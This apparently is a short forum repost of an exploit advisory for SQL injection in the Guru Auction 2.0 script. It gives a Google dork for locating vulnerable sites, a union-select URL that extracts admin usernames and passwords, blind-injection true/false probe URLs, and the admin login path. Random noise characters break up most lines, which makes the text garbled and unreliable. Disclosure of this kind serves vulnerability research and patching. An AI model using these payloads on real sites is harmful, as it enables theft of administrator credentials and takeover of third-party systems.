Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
: ]- f% d& I6 y7 s0 Y! @
" `5 O4 u0 r* V: M4 I1 ]* _2 B% v作者 : v3n0m
: \# X2 E1 N% y/ `应用 : Guru Auction 2.0$ R, E; I7 `3 H1 U# G, X+ s
Price : $49" j. _0 ?; C, u
Vendor : http://www.guruscript.com/& m8 O; u1 r9 o/ Q0 F* Z
Google Dork : inurl:subcat.php?cate_id=+ m9 a: B# N% B3 u( \$ g& x
0 U* V- j- i P! S; `5 d" A
SQLi p0c:' F1 }! K3 g r9 J5 _6 |+ }
~~~~~~~~~~
- I/ e4 I% y9 Q* M( D% U1 ehttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
4 I; t% Y2 V" H# ^5 B
( ?7 N7 O0 d% t3 I& Q6 M$ w$ r ( O; j x' t; ^% { ]2 S+ Y" f0 K
盲注 p0c:
: Z5 c1 I2 V/ x4 ^' M6 [ q~~~~~~~~~~- R2 z: V5 P$ I$ h/ I7 a
http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
6 i. c- k% K, m, }( j) whttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
9 H% G$ p0 m0 R 9 {- S/ I' `7 S# d4 u2 R9 {; g
管理登录入口:6 c; F9 J, {* @5 [: N) q
~~~~~~~~~~
. U* ~1 z. c3 Chttp://domain.tld/[path]/admin/
/ r! `1 z/ H2 M) a# {6 ] |
发表于 2012-12-31 09:24:05
收藏
支持
反对